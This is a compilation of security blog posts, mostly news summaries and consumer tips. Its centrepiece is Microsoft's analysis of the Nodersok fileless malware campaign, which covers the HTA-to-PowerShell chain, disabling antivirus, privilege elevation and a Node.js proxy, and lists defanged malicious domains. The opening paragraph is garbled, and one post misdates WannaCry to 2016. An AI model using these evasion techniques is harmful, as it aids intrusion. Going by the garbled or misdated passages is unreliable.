First launched four years ago, the fake narrator app, but a threat actor continues to alter it to guarantee it suits the environment of victims, tell the scientists. It seems that the instrument was only used in a very small amount of assaults.

BlackBerry Cylance thinks that the actor has Chinese origin based on the use of Chinese open source initiatives and the geographical place of the victims.

“As of today, precise attribution of these attacks has proven elusive. The use of PcShare backdoor, as well as the geographical location of the victims, bear similarities to a known threat actor called Tropic Trooper, which is actively targeting government institutions and heavy industry companies in Taiwan and Philippines,” BlackBerry Cylance says.

The post Cylance Security Researchers Warn Technology Firms in Southeast Asia for Chinese Open –Source Backdoor appeared first on .

How to start achieving visibility in the cloud

As a security executive, you have a curious gig. On one hand, you’re responsible for securing your organization across multiple systems, networks, clouds, and geographies. On the other, your team owns none of those things. Organizing resources in a way that makes visibility possible beyond the data center (assuming you have that to begin with) is hard. That’s because the way you achieve visibility in the cloud, or at the edge, is fundamentally different than … More

The post How to start achieving visibility in the cloud appeared first on Help Net Security.

Should the National Security Council restore the cybersecurity coordinator role?

Former national security advisor John Bolton’s elimination of the cybersecurity coordinator role in May 2018 came as a surprise to many in the cybersecurity industry, especially security professionals that are tasked with securing federal networks, protecting critical infrastructure and providing cybersecurity governance. The role was created to help orchestrate and integrate the government’s cyber policies, make sure federal agencies have adequate cybersecurity funding and coordinate responses to major cybersecurity incidents. Many believe that the abolishment … More

The post Should the National Security Council restore the cybersecurity coordinator role? appeared first on Help Net Security.

Year-over-year malware volume increased by 64%

The most common domains attackers use to host malware and launch phishing attacks include several subdomains of legitimate sites and Content Delivery Networks (CDNs) such as CloudFlare.net, CloudFront.net (which belongs to Amazon), SharePoint and Amazonaws.com, along with legitimate file-sharing websites like my[.]mixtape[.]moe, according to WatchGuard. The report for Q2 2019 also highlights that modules from the popular Kali Linux penetration testing tool made the top ten malware list for the first time. Trojan.GenericKD, which covers … More

The post Year-over-year malware volume increased by 64% appeared first on Help Net Security.

Bring your own LOLBin: Multi-stage, fileless Nodersok campaign delivers rare Node.js-based malware

We’ve discussed the challenges that fileless threats pose in security, and how Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) employs advanced strategies to defeat these sophisticated threats. Part of the slyness of fileless malware is their use of living-off-the-land techniques, which refer to the abuse of legitimate tools, also called living-off-the-land binaries (LOLBins), that already exist on machines through which malware can persist, move laterally, or serve other purposes.

But what happens when attackers require functionality beyond what’s provided by standard LOLBins? A new malware campaign we dubbed Nodersok decided to bring its own LOLBins—it delivered two very unusual, legitimate tools to infected machines:

  • Node.exe, the Windows implementation of the popular Node.js framework used by countless web applications
  • WinDivert, a powerful network packet capture and manipulation utility

Like any LOLBin, these tools are not malicious or vulnerable; they provide important capabilities for legitimate use. It’s not uncommon for attackers to download legitimate third-party tools onto infected machines (for example, PsExec is often abused to run other tools or commands). However, Nodersok went through a long chain of fileless techniques to install a pair of very peculiar tools with one final objective: turn infected machines into zombie proxies.

While the file aspect of the attack was very tricky to detect, its behavior produced is a visible footprint that stands out clearly for anyone who knows where to look. With its array of advanced defensive technologies, Microsoft Defender ATP, defeated the threat at numerous points of dynamic detection throughout the attack chain.

Attack overview

The Nodersok campaign has been pestering thousands of machines in the last several weeks, with most targets located in the United States and Europe. The majority of targets are consumers, but about 3% of encounters are observed in organizations in sectors like education, professional services, healthcare, finance, and retail.

 

Figure 1. Distribution of Nodersok’s enterprise targets by country and by sector

The campaign is particularly interesting not only because it employs advanced fileless techniques, but also because it relies on an elusive network infrastructure that causes the attack to fly under the radar. We uncovered this campaign in mid-July, when suspicious patterns in the anomalous usage of MSHTA.exe emerged from Microsoft Defender ATP telemetry. In the days that followed, more anomalies stood out, showing up to a ten-fold increase in activity:

Figure 2. Trending of Nodersok activity from August to September, 2019

After a process of tracking and analysis, we pieced together the infection chain:

Figure 3. Nodersok attack chain

Like the Astaroth campaign, every step of the infection chain only runs legitimate LOLBins, either from the machine itself (mshta.exe, powershell.exe) or downloaded third-party ones (node.exe, Windivert.dll/sys). All of the relevant functionalities reside in scripts and shellcodes that are almost always coming in encrypted, are then decrypted, and run while only in memory. No malicious executable is ever written to the disk.

This infection chain was consistently observed in several machines attacked by the latest variant of Nodersok. Other campaigns (possibly earlier versions) with variants of this malware (whose main JavaScript payload was named 05sall.js or 04sall.js) were observed installing malicious encoded PowerShell commands in the registry that would end up decoding and running the final binary executable payload.

Initial access: Complex remote infrastructure

The attack begins when a user downloads and runs an HTML application (HTA) file named Player1566444384.hta. The digits in the file name differ in every attack. Analysis of Microsoft Defender ATP telemetry points to compromised advertisements as the most likely infection vector for delivering the HTA files. The mshta.exe tool (which runs when an HTA file runs) was launched with the -embedding command-line parameter, which typically indicates that the launch action was initiated by the browser.

Furthermore, immediately prior to the execution of the HTA file, the telemetry always shows network activity towards suspicious advertisement services (which may vary slightly across infections), and a consistent access to legitimate content delivery service Cloudfront. Cloudfront is not a malicious entity or service, and it was likely used by the attackers exactly for that reason: because it’s not a malicious domain, it won’t likely raise alarms. Examples of such domains observed in several campaigns are:

  • d23cy16qyloios[.]cloudfront[.]net
  • d26klsbste71cl[.]cloudfront [.]net
  • d2d604b63pweib[.]cloudfront [.]net
  • d3jo79y1m6np83[.]cloudfront [.]net
  • d1fctvh5cp9yen[.]cloudfront [.]net
  • d3cp2f6v8pu0j2[.]cloudfront[.]net
  • dqsiu450ekr8q[.]cloudfront [.]net

It’s possible that these domains were abused to deliver the HTA files without alerting the browser. Another content delivery service abused later on in the attack chain is Cdn77. Some examples of observed URLs include:

  • hxxps://1292172017[.]rsc [.]cdn77 [.]org/images/trpl[.]png
  • hxxps://1292172017[.]rsc.cdn77[.]org/imtrack/strkp[.]png

This same strategy was also used by the Astaroth campaign, where the malware authors hosted their malware on the legitimate storage.googleapis.com service.

First-stage JavaScript

When the HTA file runs, it tries to reach out to a randomly named domain to download additional JavaScript code. The domains used in this first stage are short-lived: they are registered and brought online and, after a day or two (the span of a typical campaign), they are dropped and their related DNS entries are removed. This can make it more difficult to investigate and retrieve the components that were delivered to victims. Examples of domains observed include:

  • Du0ohrealgeek[.]org – active from August 12 to 14
  • Hi5urautopapyrus[.]org – active from April 21 to 22
  • Ex9ohiamistanbul[.]net – active from August 1 to 2
  • Eek6omyfilmbiznetwork[.]org – active from July 23 to 24

This stage is just a downloader: it tries to retrieve either a JavaScript or an extensible style language (XSL) file from the command-and-control (C&C) domain. These files have semi-random names like 1566444384.js and 1566444384.xsl, where the digits are different in every download. After this file is downloaded and runs, it contacts the remote C&C domain to download an RC4-encrypted file named 1566444384.mp4 and a decryption key from a file named 1566444384.flv. When decrypted, the MP4 file is an additional JavaScript snippet that starts PowerShell:

Interestingly, it hides the malicious PowerShell script in an environment variable named “deadbeef” (first line), then it launches PowerShell with an encoded command (second line) that simply runs the contents of the “deadbeef” variable. This trick, which is used several times during the infection chain, is usually employed to hide the real malicious script so that it does not appear in the command-line of a PowerShell process.

Second-stage PowerShell

Nodersok’s infection continues by launching several instances of PowerShell to download and run additional malicious modules. All the modules are hosted on the C&C servers in RC4-encrypted form and are decrypted on the fly before they run on the device. The following steps are perpetrated by the various instances of PowerShell:

  • Download module.avi, a module that attempts to:
    • Disable Windows Defender Antivirus
    • Disable Windows updates
    • Run binary shellcode that attempts elevation of privilege by using auto-elevated COM interface
  • Download additional modules trpl.png and strkp.png hosted on a Cdn77 service
  • Download legitimate node.exe tool from the official nodejs.org website
  • Drop the WinDivert packet capture library components WinDivert.dll, WinDivert32.sys, and WinDivert64.sys
  • Execute a shellcode that uses WinDivert to filter and modify certain outgoing packets
  • Finally, drop the JavaScript payload along with some Node.js modules and libraries required by it, and run it via node.exe

This last JavaScript is the actual final payload written for the Node.js framework that turns the device into a proxy. This concludes the infection, at the end of which the network packet filter is active and the machine is working as a potential proxy zombie. When a machine turns into a proxy, it can be used by attackers as a relay to access other network entities (websites, C&C servers, compromised machines, etc.), which can allow them to perform stealthy malicious activities.

Node.js-based proxy engine

This is not the first threat to abuse Node.js. Some cases have been observed in the past (for example this ransomware from early 2016). However, using Node.js is a peculiar way to spread malware. Besides being clean and benign, Node.exe also has a valid digital signature, allowing a malicious JavaScript to operate within the context of a trusted process. The JavaScript payload itself is relatively simple: it only contains a set of basic functions that allows it to act as a proxy for a remote entity.

Figure 4. A portion of the malicious Node.js-based proxy

The code seems to be still in its infancy and in development, but it does work. It has two purposes:

  1. Connect back to the remote C&C, and
  2. Receive HTTP requests to proxy back to it

It supports the SOCKS4A protocol. While we haven’t observed network requests coming from attackers, we wrote what the Node.js-based C&C server application may look like: a server that sends HTTP requests to the infected clients that connect back to it, and receives the responses from said clients. we slightly modified the malicious JavaScript malware to make it log meaningful messages, ran a JavaScript server, ran the JavaScript malware, and it proxied HTTP requests as expected:

Figure 5.The debug messages are numbered to make it easier to follow the execution flow

The server starts, then the client starts and connects to it. In response, the server sends a HTTP request (using the Socks4A protocol) to the client. The request is a simple HTTP GET. The client proxies the HTTP request to the target website and returns the HTTP response (200 OK) and the HTML page back to the server. This test demonstrates that it’s possible to use this malware as a proxy.

05sall.js: A variant of Nodersok

As mentioned earlier, there exist other variants of this malware. For example, we found one named 05sall.js (possibly an earlier version). It’s similar in structure to the one described above, but the payload was not developed in Node.js (rather it was an executable). Furthermore, beyond acting as a proxy, it can run additional commands such as update, terminate, or run shell commands.

Figure 6. The commands that can be processed by the 05sall.js variant.

The malware can also process configuration data in JSON format. For example, this configuration was encoded and stored in the registry in an infected machine:

Figure 7. Configuration data exposing component and file names

The configuration is an indication of the modular nature of the malware. It shows the names of two modules being used in this infection (named block_av_01 and all_socks_05).

The WinDivert network packet filtering

At this point in the analysis, there is one last loose end: what about the WinDivert packet capture library? We recovered a shellcode from one of the campaigns. This shellcode is decoded and run only in memory from a PowerShell command. It installs the following network filter (in a language recognized by WinDivert):

This means Nodersok is intercepting packets sent out to initiate a TCP connection. Once the filter is active, the shellcode is interested only in TCP packets that match the following specific format:

Figure 8. Format of TCP packets that Nodersok is interested in

The packet must have standard Ethernet, IP, and 20 bytes TCP headers, plus an additional 20 bytes of TCP extra options. The options must appear exactly in the order shown in the image above:

  • 02 04 XX XX – Maximum segment size
  • 01 – No operation
  • 03 03 XX – Windows Scale
  • 04 02 – SACK permitted
  • 08 0A XX XX XX XX XX XX XX XX – Time stamps

If packets matching this criterion are detected, Nodersok modifies them by moving the “SACK Permitted” option to the end of the packet (whose size is extended by four bytes), and replacing the original option bytes with two “No operation” bytes.

Figure 9. The format of TCP packets after Nodersok has altered it: the “SACK permitted” bytes (in red) have been moved to the end of the packet, and their original location has been replaced by “No operation” (in yellow)

It’s possible that this modification benefits the attackers; for example, it may help evade some HIPS signatures.

Stopping the Nodersok campaign with Microsoft Defender ATP

Both the distributed network infrastructure and the advanced fileless techniques allowed this campaign fly under the radar for a while, highlighting how having the right defensive technologies is of utmost importance in order to detect and counter these attacks in a timely manner.

If we exclude all the clean and legitimate files leveraged by the attack, all that remains are the initial HTA file, the final Node.js-based payload, and a bunch of encrypted files. Traditional file-based signatures are inadequate to counter sophisticated threats like this. We have known this for quite a while, that’s why we have invested a good deal of resources into developing powerful dynamic detection engines and delivering a state-of-the-art defense-in-depth through Microsoft Defender ATP:

Figure 10. Microsoft Defender ATP protections against Nodersok

Machine learning models in the Windows Defender Antivirus client generically detects suspicious obfuscation in the initial HTA file used in this attack. Beyond this immediate protection, behavioral detection and containment capabilities can spot anomalous and malicious behaviors, such as the execution of scripts and tools. When the behavior monitoring engine in the client detects one of the more than 500 attack techniques, information like the process tree and behavior sequences are sent to the cloud, where behavior-based machine learning models classify files and identify potential threats.

Meanwhile, scripts that are decrypted and run directly in memory are exposed by Antimalware Scan Interface (AMSI) instrumentation in scripting engines, while launching PowerShell with a command-line that specifies encoded commands is defeated by command-line scanning. Tamper protection in Microsoft Defender ATP protects systems modifications that attempt to disable Windows Defender Antivirus.

These multiple layers of protection are part of the threat and malware prevention capabilities in Microsoft Defender ATP. The complete endpoint protection platform provides multiple capabilities that empower security teams to defend their organizations against attacks like Nodersok. Attack surface reduction shuts common attack surfaces. Threat and vulnerability management, endpoint detection and response, and automated investigation and remediation help organizations detect and respond to cyberattacks. Microsoft Threat Experts, Microsoft Defender ATP’s managed detection and response service, further helps security teams by providing expert-level monitoring and analysis.

With Microsoft Threat Protection, these endpoint protection capabilities integrate with the rest of Microsoft security solutions to deliver comprehensive protection for comprehensive security for identities, endpoints, email and data, apps, and infrastructure.

 

Andrea Lelli
Microsoft Defender ATP Research

The post Bring your own LOLBin: Multi-stage, fileless Nodersok campaign delivers rare Node.js-based malware appeared first on Microsoft Security.

5G and IoT: How to Approach the Security Implications

Experts from Nokia, iboss and Sectigo talk 5G mobile security for internet of things (IoT) devices in this webinar YouTube video (transcript included).

Tackling biometric breaches, the decentralized dilemma

A recent discovery by vpnMentor revealed a worst case scenario for biometrics: a large cache of biometric data being exposed to the rest of the world. In this case web-based biometric security smart lock platform, BioStar 2, was breached. This breach surfaces a common flaw that many of the established providers of biometric authentication have built into their system. Many biometric providers store biometrics in a large centralized database. To avoid a biometric dystopia, adoption … More

The post Tackling biometric breaches, the decentralized dilemma appeared first on Help Net Security.

Cybersecurity breach experience strengthens CVs

It is in businesses’ best interest to hire cybersecurity leaders who have suffered an avoidable breach, because of the way it changes how security professionals think, feel and behave, according to Symantec. The findings reveal that suffering a breach – and coming out the other side – significantly reduces security leaders’ future workplace stress levels, while improving their likelihood to share knowledge. “It might sound counter intuitive at first,” comments Darren Thomson, CTO, Symantec EMEA, … More

The post Cybersecurity breach experience strengthens CVs appeared first on Help Net Security.

Adopting DevOps practices leads to improved security posture

A strong DevOps culture based on collaboration and sharing across teams, leads to an improved security posture, according to Puppet. Twenty-two percent of the firms at the highest level of security integration having reached an advanced stage of DevOps maturity compared to only six percent of the firms with no security integration. Additionally, the report found that Europe is pulling ahead of the US and the Asia Pacific regions when it comes to firms with … More

The post Adopting DevOps practices leads to improved security posture appeared first on Help Net Security.

Attention YouTubers: Protect Your Account From Being Hacked

Did you know that YouTube has 23 million content creators worldwide? Well, it turns out that many of these video gurus found themselves in the middle of a cybersecurity calamity this past weekend. According to Forbes, reporter Catalin Cimpanua discovered a massive spear phishing campaign targeting YouTube content creators, tricking them into giving up their login credentials.

How are cybercriminals using this sneaky tactic to swoop victims’ logins? Cimpanua discovered that hackers leveraged a substantial database to send emails to a targeted list of YouTube influencers. These emails contained phishing links luring the victims to fake Google login pages. Once the YouTuber filled out their login credentials, the attacker gained full access to the victim’s YouTube account, allowing them to change the vanity URL. This leaves the actual owner of the channel and their subscribers believing that the account has been deleted. Additionally, some of the accounts that were successfully hacked utilized two-factor authentication (2FA) via SMS, suggesting that cybercriminals used a reverse proxy. This type of proxy server collects resources on behalf of another server, allowing a cybercriminal to intercept 2FA codes sent over SMS in real-time.

Those targeted in this phishing scheme include mostly influencers covering a variety of genres, especially technology, music, gaming, and Disney. But with millions of content creators using YouTube as a platform to share their insights with the world, it’s critical that all users follow proper cybersecurity precautions to protect their credentials. So, what are some proactive steps YouTubers can take to ensure that their accounts are kept safe and secure? Check out the following tips:

  • Be on the lookout for phishing emails. If you receive an email from a company or business asking you to confirm your credentials, be skeptical. Phishers often forge messages from legitimate companies hoping to trick users into entering their login details.
  • Think before you click. Before clicking on a link, especially one in a suspicious email, hover over it to see if the URL address looks legitimate. If the URL contains misspellings, grammatical errors, or strange characters, it’s best to avoid interacting with the link.
  • Use two-factor authentication apps. While two-factor authentication is by no means an end-all, be-all security tactic, it does provide a good first line of defense if a hacker attempts to hijack your account. For this particular scheme, cybercriminals were able to bypass 2FA via SMS and intercept security codes. Therefore, users need to look into authenticator app options rather than simply relying on a code sent over SMS.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Attention YouTubers: Protect Your Account From Being Hacked appeared first on McAfee Blogs.

Investing in Enterprise security is a necessity, not a luxury

Estimated reading time: 3 minutes

In the current ‘digital-first’ environment that organizations and businesses operate nowadays, success and failure can often depend on enterprise security solutions. Businesses operate in an environment where the threats from the digital sphere can often outweigh the threats from a physical sphere. The list of threats is huge and ever-expanding – malware, phishing, ransomware, cryptojacking, data breach, hacks, financial fraud, password loss and a lot more.

Neglecting cybersecurity has both financial and reputational damages. A study estimated that the average cost of a data breach rose 12% over the last few years to a staggering $3.92 million. And as some of the biggest organizations in the world like Equifax, Marriott International and Yahoo realized, threats have repercussions on brand value as well, affecting customer trust and reputation in a way that may not be possible to value monetarily but certainly leave a lasting impact.

That is why an increasing amount of organizations are waking up to the fact that enterprise security is no longer just an investment – it is a necessity and a requirement in today’s day and age.

Global research and advisory firm Gartner estimated that worldwide information security spending would exceed $124 billion in 2019.

How does treating enterprise security help benefit an organization? There are many ways but some of the most important ones are:

  1. Your data is substantially safer

No organization is completely safe – cybersecurity is one of those sectors where every second, there are new threats to the organization. Such an environment demands to have a strong enterprise security framework to keep organizations safe.

Most cybercriminals use basic tools and strategies which are already identified and blocked by most enterprise security solutions helping your data, your businesses and your employees stay safe from cybercrimes. In fact, Seqrite’s range of enterprise security solutions allows administrators to see the number of breach attempts and different cyber threats repelled to understand how the enterprise is staying better protected.

  1. Helps to meet compliance and regulatory requirements

For any organization operating in the digital world, there are various regulations, depending on where the enterprise is operating from and which countries its customers are based in, that one needs to comply to.

Non-compliance with these regulations (GDPR, HIPAA, PCI DSS, etc.) can result in hefty fines – in extreme cases even destroy businesses. But enterprises who have utilized a cybersecurity solution will be in a much better position to meet compliance and regulatory requirements.

  1. Build cyber trust

The impact of cyber attacks can be disastrous – affected reputation, decrease in customer base, legal liabilities etc. are all by-products that can undo the great work done by SMBs, SOHOs & enterprises and possibly floor these businesses.

Enterprises need to work hard to avoid this kind of a situation and win the trust of their users and stakeholders by ensuring them that they are taking the best possible measures to keep data safe. Once stakeholders and customers are convinced that the organization they are interacting with and entrusting with for their valuable data are serious about keeping it safe with the help of enterprise security, it helps to build trust and can be a key differentiator in customer loyalty.

  1. Preventing the loss of business

An enterprise that suffers a data breach or cyber attack suffers a loss in business. Client data is compromised, confidential data may be leaked and the data, if backed up, may take months to recover. In the worst-case scenario, if data is not backed up, it may be irretrievable.

All these contribute to a major loss of business for an enterprise which they can avoid to a certain extent by investing in an enterprise security framework.

Organizations can consider solutions like Seqrite’s Endpoint Security, a simple and comprehensive platform to protect enterprise networks from advanced threats, and Unified Threat Management, a one-stop solution for all enterprise security needs.

The post Investing in Enterprise security is a necessity, not a luxury appeared first on Seqrite Blog.

Rise of RDP as a target vector

Recent reports of targeted attacks using RDP as an initial entry vector have certainly caused significant headlines in lieu of the impact they have caused. In the midst of city wide impacts, or even million dollar (plus) demands it is easy to overlook the initial entry vector. What began as ‘targeted’ emails focusing on predominantly consumers, the evolution of ransomware has widened to incorporate pseudo attacks intended purely for destruction (e.g. no viable decryption capability, … More

The post Rise of RDP as a target vector appeared first on Help Net Security.

99% of misconfiguration incidents in the cloud go unnoticed

IaaS is now the fastest growing area of the cloud due to the speed, cost and reliability with which organizations can create and deploy applications, according to McAfee. Cloud-Native Breach (CNB) attack chain The results of the survey demonstrate that 99 percent of IaaS misconfigurations go unnoticed—indicating awareness around the most common entry point to new “Cloud-Native Breaches” (CNB) is extremely low. “In the rush toward IaaS adoption, many organizations overlook the shared responsibility model … More

The post 99% of misconfiguration incidents in the cloud go unnoticed appeared first on Help Net Security.

Older vulnerabilities and those with lower severity scores still being exploited by ransomware

Almost 65% of top vulnerabilities used in enterprise ransomware attacks targeted high-value assets like servers, close to 55% had CVSS v2 scores lower than 8, nearly 35% were old (from 2015 or earlier), and the vulnerabilities used in WannaCry are still being used today, according to RiskSense. The data was gathered from a variety of sources including RiskSense proprietary data, publicly available threat databases, as well as findings from RiskSense threat researchers and penetration testers. … More

The post Older vulnerabilities and those with lower severity scores still being exploited by ransomware appeared first on Help Net Security.

Security capabilities are lagging behind cloud adoption

Security professionals regard their existing tools inadequate for securing critical cloud data, even as their organizations invest heavily, with increasing speed, in cloud applications, according to ESG. The report, based on surveys with responses ranging from approximately 392-600 senior IT decision makers and cyber security professionals, reveals that cloud-first strategies are becoming more common, with 39 percent of respondents from cloud-first organizations saying that they only consider on-premises if someone makes a compelling business case … More

The post Security capabilities are lagging behind cloud adoption appeared first on Help Net Security.

Could audio warnings augment your ability to fight off cyber attacks?

The security of your environment shouldn’t depend on whether you’re looking in the right place at the right time. While active visual means such as dashboards, emails, tickets, and chat messages are a vital part of security event monitoring, they might not get your attention if your eyes are elsewhere. Even when you’re focused on the right screen, important events can easily get buried in an overload of information, delaying their processing – or allowing … More

The post Could audio warnings augment your ability to fight off cyber attacks? appeared first on Help Net Security.

CISO role grows in stature, but challenges remain

In order to find out how CISOs perceive the state of their profession, Optiv Security interviewed 200 CISOs or senior security personnel with equivalent responsibilities in both the US and the UK. Perceiving cybersecurity Survey respondents indicated a fundamental change in how senior executives and board members perceive cybersecurity. Perhaps most surprising was the fact that 58% said experiencing a data breach makes them more attractive to potential employers. This stands in stark contrast to … More

The post CISO role grows in stature, but challenges remain appeared first on Help Net Security.

$5 trillion threat of cyber attacks spur investments in solutions, talent and tech

IT & Business Services M&A Market’s disclosed deal value reached a whopping $97 billion in 1H 2019 – the highest total on record for a six-month period, according to Hampleton Partners. There has also been a significant rise in valuations, with overall median disclosed deal amount reaching $43 million in 1H 2019, up from $23 million in 2H 2018. Deal volume lessened, with 370 transactions inked compared to 432 in 2H 2018. However, trailing 30-month … More

The post $5 trillion threat of cyber attacks spur investments in solutions, talent and tech appeared first on Help Net Security.

How data breaches forced Amazon to update S3 bucket security

Amazon launched its Simple Storage Service (better known as S3) back in 2006 as a platform for storing just about any type of data under the sun. Since then, S3 buckets have become one of the most commonly used cloud storage tools for everything from server logs to customer data, with prominent users including Netflix, Reddit, and GE Healthcare. While S3 rolled out of the gate with good security principals in mind, it hasn’t all … More

The post How data breaches forced Amazon to update S3 bucket security appeared first on Help Net Security.

How important is packet capture for cyber defense?

Organizations using full packet capture are better prepared to battle cyber threats, according to an Enterprise Management Associates (EMA) report. Visibility and accuracy of packet capture The report highlights that the visibility and accuracy of packet capture data provides the best source of certainty for threat detection, and notes that the adoption of full packet capture has accelerated over the past 12 months. The report concludes that “…it is clear that those using packet capture … More

The post How important is packet capture for cyber defense? appeared first on Help Net Security.

Product showcase: NetLib Security Encryptionizer

NetLib Security has spent the past 20+ years developing a powerful, patented solution that starts by setting up a defense for any organization wherever your data resides: physical, virtual and cloud. Our platform is geared to simplify the process for you while ensuring unprecedented levels of security are in place. NetLib Security encryption solutions do not require specialized skill sets, programming changes, or administrative overhead; we simplify your data security needs with an affordable solution … More

The post Product showcase: NetLib Security Encryptionizer appeared first on Help Net Security.

5 Cybersecurity Trends in the Professional Services Sector

Cybersecurity is an increasingly significant focus for many companies as cyberattacks become more frequent and more costly.

Which are 5 Cybersecurity trends in the professional services sector?

Professional services organizations are especially vulnerable due to the high value of the industry and the data they store — like Social Security numbers, personal financial information and classified business communications.

Employees with non-technical backgrounds or low digital literacy often need access to networks that store highly sensitive data. But these same employees are the most vulnerable to cybercriminals.

The cybersecurity landscape is changing, and every industry will need to adapt. But professional services companies should pay the closest attention to these five trends.

1. Employee Training on Phishing and Digital Security

Hackers aren’t only coders — they’re also social engineers. When the network becomes harder to access, unprepared employees are one of the next best vectors of attack. One in 99 emails is a phishing attack, a fraudulent email designed to look legitimate so an employee will click on a malicious link inside or reply with privileged information.

Employees will need training on digital safety: how to spot phishing emails, and also how to spot bad links and downloads that can be a vector for viruses or other attacks.

2. Hackers Target Mobile Devices

Most phishing happens over email. But hackers can target any device that connects to the internet — including your smartphone. And once a hacker has access to your device, it can be trivial to, for example, intercept and store copies of all the emails you receive. Or use your digital credentials to gain access to confidential information.

IT departments will also need to train employees on the security of personal devices, and — if necessary — restrict what sort of devices can access sensitive data.

3. Ransomware Will Cost Businesses More

Ransomware is a term used to describe viruses that encrypt all the files on a user’s computer and hold them hostage for a fee. Ransomware costs small business an estimated $75 billion each year. And the ransoms continue to get higher and higher.

One major virus — the WannaCry ransomware — nearly shut down the British health care system in 2016. The virus is still infecting computers, even though researchers discovered a killswitch in the virus’ code two years ago.

In 2016, the professional services industry in the United States had a value of $1,100 billion. The industry’s presumed high ability to pay makes it a major target for ransomware.

Cybersecurity professionals need to learn how to respond to this specific kind of attack, and employees need training in digital literacy that will help them identify ransomware attacks and refer them to a security professional.

4. Data Privacy and Data Stewardship Are Becoming High Priorities

New data regulations, like the GDPR in Europe, have made data breaches more costly than ever. Companies who hold on to customer data must take the necessary precautions to defend that data by encrypting the data and restricting access to their network. Companies must also inform customers as soon as possible after a breach — sometimes within just a few days.

Companies, seeing the fines paid by major businesses like Equifax and British Airways, will want to beef up their security in a way that complies with U.S. (and possibly GDPR) regulations. These companies will also want to prepare for the worst-case scenario — how will we know if there has been a breach? And how will we respond?

5. Automation and AI Will Come to Cybersecurity

In cybersecurity, a burnout crisis is looming on the horizon. As demand outstrips the number of cybersecurity professionals on the job market, cybersecurity experts are working longer hours, defending against more threats — and shouldering more of the blame in the case of a breach. Cybercrimes are more common than ever, but the number of people entering cybersecurity hasn’t kept up.

Enterprises, wanting to lighten the burden placed on their IT and cybersecurity teams, are looking for any chance to automate processes.

Cybersecurity platforms that use artificial intelligence to beat digital threats are the latest trend in cybersecurity solutions — even if cybersecurity experts are wary of the technology. Be ready to see AI-based cybersecurity tools to become commonplace in the future, but don’t expect they will make your company invulnerable to attack.

What These Changes Mean for Professional Services

The professional services industry will need to adapt to a changing cybersecurity landscape. As data breaches become more common, businesses will need to make sure their employees can spot suspicious emails and links. And even the most secure company should prepare for the possibility of a data breach.

Cybersecurity is constantly advancing, but so are cybercriminals. Professional services industry will need to stay on top of these trends to keep their information safe.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, hacking)

The post 5 Cybersecurity Trends in the Professional Services Sector appeared first on Security Affairs.

Researchers analyzed 16.4 billion requests to see how bots affect e-commerce

The sophistication level of bots attacking e-commerce sites is on the rise, with nearly four-fifths (79.2 percent) classified as moderate or sophisticated, up from 75.8 percent in 2018, according to the Imperva report. The report analyzed 16.4 billion requests from 231 domains during the month of July 2019. E-commerce companies suffer from a continual barrage of bad bots that criminals, competitors, resellers and investment companies use to carry out unauthorized price scraping, inventory checking, denial … More

The post Researchers analyzed 16.4 billion requests to see how bots affect e-commerce appeared first on Help Net Security.

Some IT teams move to the cloud without business oversight or direction

27% of IT teams in the financial industry migrated data to the cloud for no specific reason, and none of them received financial support from management for their cloud initiatives, according to Netwrix. Moreover, every third organization that received no additional cloud security budget in 2019 experienced a data breach. Other findings revealed by the research include: 56% of financial organizations that had at least one security incident in the cloud last year couldn’t determine … More

The post Some IT teams move to the cloud without business oversight or direction appeared first on Help Net Security.

Is Your Medical Data Safe? 16 Million Medical Scans Left Out in the Open

Have you ever needed to get an X-ray or an MRI for an injury? It turns out that these images, as well as the health data of millions of Americans, have been sitting unprotected on the internet and available to anyone with basic computer expertise. According to ProPublica, these exposed records affect more than 5 million patients in the U.S. and millions more across the globe, equating to 16 million scans worldwide that are publicly available online.

This exposure affects data used in doctor’s offices, medical imaging centers, and mobile X-ray services. What’s more, the exposed data also contained other personal information such as dates of birth, details on personal physicians, and procedures received by patients, bringing the potential threat of identity theft closer to reality. And while researchers found no evidence of patient data being copied from these systems and published elsewhere, the implications of this much personal data exposed to the masses could be substantial.

To help users lock down their data and protect themselves from fraud and other cyberattacks, we’ve provided the following security tips:

  • Be vigilant about checking your accounts. If you suspect that your data has been compromised, frequently check your bank account and credit activity. Many banks and credit card companies offer free alerts that notify you via email or text messages when new purchases are made, if there’s an unusual charge, or when your account balance drops to a certain level. This will help you stop fraudulent activity in its tracks.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identify Theft Protection will help you to monitor your accounts, alert you of any suspicious activity, and help you to regain any losses in case something goes wrong.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Is Your Medical Data Safe? 16 Million Medical Scans Left Out in the Open appeared first on McAfee Blogs.

Eight great habits that enterprises can practice for bolstering cybersecurity

Estimated reading time: 3 minutes

Efficient cybersecurity is built on the foundation of good habits practised by internal customers. Enterprises may think a great deal about implementing effective cybersecurity practices and have plenty of meetings, but it’s actually not that complicated.

An effective framework is the first step but more importantly, is ensuring effective habit-formulation.

Unfortunately, enterprises are populated by humans who like to take the easier but riskier way out. Whether it’s setting the same password across all accounts, leaving data freely available or using company devices on risky Wi-Fi networks, bad habits can be problematic.

Here are a few tendencies that should be eliminated as soon as possible.

  1. Weak passwords

The problem with weak passwords is an issue that plagues an entire organization, from the top to the bottom. It’s not enough to have a policy about strong passwords – it’s also important to run regular campaigns across the entire organization with real-life case studies to educate employees on the importance of using strong passwords and how to do so.

  1. A lack of a security policy

The lack of a single unified security policy is an extremely bad enterprise security habit. A proper policy keeps all information and strategies in one place, becoming a one-stop repository in case of crises. Without a security policy, it is difficult for enterprises to remain protected.

  1. Taking shortcuts

